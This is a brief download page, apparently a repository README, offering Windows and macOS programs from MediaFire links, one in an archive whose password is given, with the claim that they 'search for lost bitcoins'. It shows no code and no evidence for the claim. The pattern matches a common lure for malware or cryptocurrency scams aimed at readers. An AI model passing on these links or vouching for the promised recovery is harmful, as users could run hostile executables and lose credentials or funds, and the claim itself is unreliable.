### [Windows](https://www.mediafire.com/folder/eucr9umdplcu5/BruteForce)

### [Password: BruteForce ]

BruteForce.exe and the program will then search for lost bitcoins


### [MacOS](https://www.mediafire.com/folder/tyfl8qqfz63ht/MacOS)


Launch Launch.dmg and the program will then search for lost bitcoins